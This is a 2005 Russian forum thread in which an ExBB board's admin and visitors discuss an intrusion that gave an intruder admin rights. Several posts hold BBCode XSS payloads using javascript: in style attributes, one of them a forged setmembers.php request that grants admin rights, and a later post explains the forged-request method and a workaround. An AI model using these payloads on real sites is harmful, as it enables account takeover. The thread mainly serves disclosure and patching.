Нет доступа к файлу data/boardinfo.php или нарушена его структура, либо не верно задан путь к файлам форума! Проверьте права.
Форум Физика Магии » Административный раздел » Технические вопросы » |
1. Гость - 17 Октября, 2005 - 14:55:39 | |||
Мне форум нужен на 20 минут, не чего уничтожать и менять не буду. только 20 минут покапаюсь и верну всё как было! | |||
2. Гость - 17 Октября, 2005 - 15:15:37 | |||
htrhtrhtrhtr | |||
3. С.И. Доронин - 17 Октября, 2005 - 15:17:27 | |||
afonja Если занимательно и интересно, может быть поможете и примете участие в работе форума, я бы и так отдал Вам все права ![]() ![]() ![]() ![]() | |||
4. Гость - 17 Октября, 2005 - 15:19:42 | |||
Особо увлекаться не буду, но форум защитить помогу ![]() И так работы по горло, вот сейчас получил заказ на взлом подобного форума - сорри, но ваш первый попался на глаза, вот я его и кавыряю ![]() ООЧЕНЬ большая просьба - зайди на свой ФТП и посмотри плиз - нет ли в папке /forum/uploads/ файла shell.php | |||
5. Гость - 17 Октября, 2005 - 15:41:39 | |||
htrhtrhrthrt | |||
6. С.И. Доронин - 17 Октября, 2005 - 15:41:57 | |||
Нет, файла shell.php там нет, только: att-435387d90c9574.gif index.html Если будут еще вопросы отвечу позже. А сейчас убегаю, остаетесь за полного хозяина ![]() Кстати, вопрос, может, подскажете, как в XP избавиться от выскакивающего сообщения, что компьютер инфицирован spyware. Вчера подхватил каких-то троянов и червей, вроде их убрал Ad-Ware, но сообщение все равно выскакивает. | |||
7. Гость - 17 Октября, 2005 - 15:45:10 | |||
Вопервых Антивирусником почистить, во вторых нажимаете START/Пуск , Run/Запустить , пишите "msconfig" и в закладке "Startup/Запуск" убираете всё, что вам не надо! (Добавление) Ещё вопрос - какие прова у вас стоят на папку /uploads/ и на папку /im/avatars/personal/ ?! Связаться со мной - ICQ 492365 (Добавление) Ладно, с вас хватит... складывю свои полномочия и передаю обратно... пойду следующий поищи, какой-то у вас не стандартный форум то ![]() Просьба ответить на вопрос который стоит выше! P.S. надеюсь не много намусорил - убраться смогёте?! P.S.S А физика мне пригодиться ![]() Всё, удачи всем! | |||
8. С.И. Доронин - 17 Октября, 2005 - 19:01:06 | |||
На папку /uploads/ стоят права 777, а на /im/avatars/personal/ 775 Спасибо ![]() | |||
9. С.И. Доронин - 17 Октября, 2005 - 21:22:31 | |||
Аськой я не пользуюсь, когда-то давно была, а сейчас не установлена. Буду признателен, если подскажете, как залатать дыру и получше защитить форум ![]() | |||
10. Next - 18 Октября, 2005 - 09:46:54 | |||
С.И. Доронин Для начала права на каталоги проверьте. http://forum.alfaspace.net/index.php?action=vthread&forum=1&topic=825 (Добавление) Похоже форумы exBB очень большая дыра. Сюдя по найденой инфе. Я тут побалуюсь немного для саморазвития. Ок? ![]() | |||
11. Гость - 18 Октября, 2005 - 10:35:32 | |||
[EMAIL=[URL=s as=`s@wew.ew]mailto:assss@wew.ew ] sssssss[/URL][/EMAIL]` style=`background:url(javaSCrip t:alert(/Hi_from_hacker/))` | |||
12. Гость - 18 Октября, 2005 - 10:37:07 | |||
[EMAIL=[URL=s as=`s@wew.ew]mailto:assss@wew.ew ]sssssss[/URL][/EMAIL]` style=`background:url(javaSCrip t:alert(/Hi_from_hacker/))` | |||
13. Next - 18 Октября, 2005 - 10:41:47 | |||
Плохой из меня хакер. :) СИД, хоть у меня и не получилось, тут несколько советов по заплаткам. http://krsuhelp.to.kg/forums/index.php?s=096a3070a0c8d01e9bf90e4c48c787f0&showtopic=377 Если не сложно, можете показать исходные текты сообщений: http://physmag.h1.ru/forum/topic.php?forum=10&topic=1&start=1#1129547737 http://physmag.h1.ru/forum/topic.php?forum=10&topic=1&start=1#1129549299 http://physmag.h1.ru/forum/topic.php?forum=2&topic=21&start=1#1128516456 ЗЫ. Я еще попытаюсь. :) (Отредактировано автором: 18 Октября, 2005 - 12:37:46) | |||
14. Next - 18 Октября, 2005 - 12:47:48 | |||
1 [color='Z=]'style='background:url(javascript:document.images[0].src="http://physmag.h1.ru/forum/setmembers.php? action=edit_user&checkaction=yes&userid=93 &membertitle=&emailaddress=lol@lol.ru&newname=Next&password= &homepage=&aolname=&icqnumber=&location=&interests=&signature= &numberofposts=0&avatar=noavatar.gif&membercode=ad &submit=%CE%F2%EF%F0%E0%E2%E8%F2%FC")'[/color] (Отредактировано автором: 18 Октября, 2005 - 14:53:42) | |||
15. С.И. Доронин - 18 Октября, 2005 - 14:53:06 | |||
Next Цитата:
ОК! Дело нужное ![]() Цитата:
В первых двух файлах ничего нет кроме строчки htrhtrhtrhtr В последнем обычное сообщение с картинкой (судя по IP это другой Гость ![]() Код:
На Holm-е, где стоит сайт и форум, вообще довольно жесткие требования и свои установки на запуск файлов из директорий. Мне самому не удается часть файлов запустить на выполнение, например, я не могу развернуть поиск по форуму, хотя на другом бесплатном хостинге это делал без проблем. | |||
16. Next - 18 Октября, 2005 - 14:58:15 | |||
С.И. Доронин Цитата:
Как то парень туда вставил картинки и видео. ![]() Большинство описаных дыр у меня не сработало. ![]() ![]() [color=#39]fffff[/color]' style=background:url(javascript:alert()); (Отредактировано автором: 18 Октября, 2005 - 16:54:29) | |||
17. С.И. Доронин - 18 Октября, 2005 - 16:04:35 | |||
На форуме ExBB http://www.exbb.revansh.com/ я в свое время смотрел об этом, и некоторые дыры заделал, но не все ![]() | |||
18. Next - 18 Октября, 2005 - 16:23:38 | |||
Я пока сдаюсь. ![]() | |||
19. С.И. Доронин - 18 Октября, 2005 - 16:31:29 | |||
Картинки он загрузил в папку /uploads. Я изменил права доступа на нее, сделал 711. | |||
20. Next - 18 Октября, 2005 - 16:50:23 | |||
С.И. Доронин Вот еще описание свеженайденых уязвимостей: http://pro-hack.ru/articles/bug/exbbv1.9.1.txt (Отредактировано автором: 18 Октября, 2005 - 17:41:39) | |||
21. Гость - 23 Октября, 2005 - 17:16:13 | |||
Это Я, afonja, решил зайти посмотреть как вы тута поживаете... Вобщем так, сейчас тебе скажу как немного прикрыть эту дыру... | |||
22. Гость - 23 Октября, 2005 - 17:20:58 | |||
Сорри надо бежать, потом объясню...! | |||
23. Любовь - 26 Октября, 2005 - 12:08:25 | |||
С.И. Доронин похоже, на форуме появился троян, не могу заходить, мои жучки реагируют сразу. в смысле доктор Веб | |||
24. С.И. Доронин - 27 Октября, 2005 - 16:21:26 | |||
Любовь Скорее всего, проблемы на Вашем компьютере. Попробуйте скачать программу Ad-Aware http://www.adaware.ru/download.htm и проверьте свой компьютер. | |||
25. Любовь - 27 Октября, 2005 - 22:07:43 | |||
С.И. Доронин спасибо, сын это делает регулярно) | |||
26. Гость - 04 Ноября, 2005 - 21:21:14 | |||
Ну вот я и нашёл минутку помочь вам | |||
27. Гость - 04 Ноября, 2005 - 21:34:03 | |||
это я (AfonjA) короче, расписывать роман я тут не буду, быстренько в крации и постараюсь общепонятно... Короче форум ExBB не использует БД, вот в этом и его проблема, а также ему побарабану каким методом получать запрос - GET или POST, чем я и воспользовался, то есть я написал скрипт(закачал на свой хост и вставил в форум тэгом [IMG]), чтобы у всех просмотревших моё сообщение на форуме без их ведома выполнялась ССЫЛКА, которая меняет мои привилегии на админские, когда админ форума (С.И. Доронин) посмотрел это, тогда я и стал админом... Ссылка используеться стандартная(первоночальная), то есть если админ не копал *.php файлы форума и не менял некоторые значения, то эта ссылка работает... То есть как такого решения этой проблемы нет, только по той причине, что этот форум не использует БД ![]() Ищем в файле "setmembers.php" такую строчку Код:
и видим вот это : .'<option value="ad">'.$lang['Admin'] То есть используя ссылку по каторой я делаю себя админом идёт примерно следующий запрос : membercode=ad А изминив "ad" на любое другое значение (н.п. qwe) уже эта ссылка не сработает, да и взломщик врятле догадаеться что дело в этом ![]() Вот и всё, если что - kirjuha2003@hotmail.com | |||
28. Гость - 04 Ноября, 2005 - 21:40:01 | |||
С.И. Доронин С тебя домашка по физики :P | |||
29. С.И. Доронин - 05 Ноября, 2005 - 01:10:17 | |||
Спасибо! Сочтемся ![]() |
Powered by ExBB 1.9.1 Original design created by Vjacheslav Trushkin. Converted to exBB by Markus® |